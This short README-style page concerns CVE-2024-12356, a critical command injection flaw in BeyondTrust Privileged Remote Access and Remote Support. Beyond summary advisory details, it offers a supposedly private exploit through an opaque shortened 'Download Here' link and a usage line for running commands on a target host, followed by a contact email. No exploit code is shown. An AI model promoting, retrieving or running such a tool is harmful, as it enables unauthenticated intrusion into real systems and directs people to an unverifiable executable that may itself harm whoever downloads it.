# CVE-2024-12356: Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)
## Overview
A critical vulnerability has been discovered in BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products that can allow an unauthenticated attacker to inject commands that are run as a site user. This is a command injection vulnerability, classified under CWE-77 (Improper Neutralization of Special Elements used in a Command).
## Details
+ CVE ID: CVE-2024-12356
+ Published: 2024-12-16
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.8
+ Vendor: **BeyondTrust**
## Exploit
**[Download Here](https://bit.ly/3OZPYhj)**
## Vulnerability Description
The impact of this vulnerability is severe. It allows unauthenticated attackers to execute arbitrary commands with the privileges of a site user. This leads to unauthorized access, data breaches, system compromise, and full control over the affected systems. The attack vector is network-based, requires no user interaction, and has low attack complexity, making it relatively easy for attackers to exploit.
## Usage
```
python CVE-2024-12356.py -h 10.10.10.10 -c 'uname -a'
```
## Affected Versions
**Affected from 0 through 24.3.1**
## Contact
For inquiries, please contact cloudefence@thesecure.biz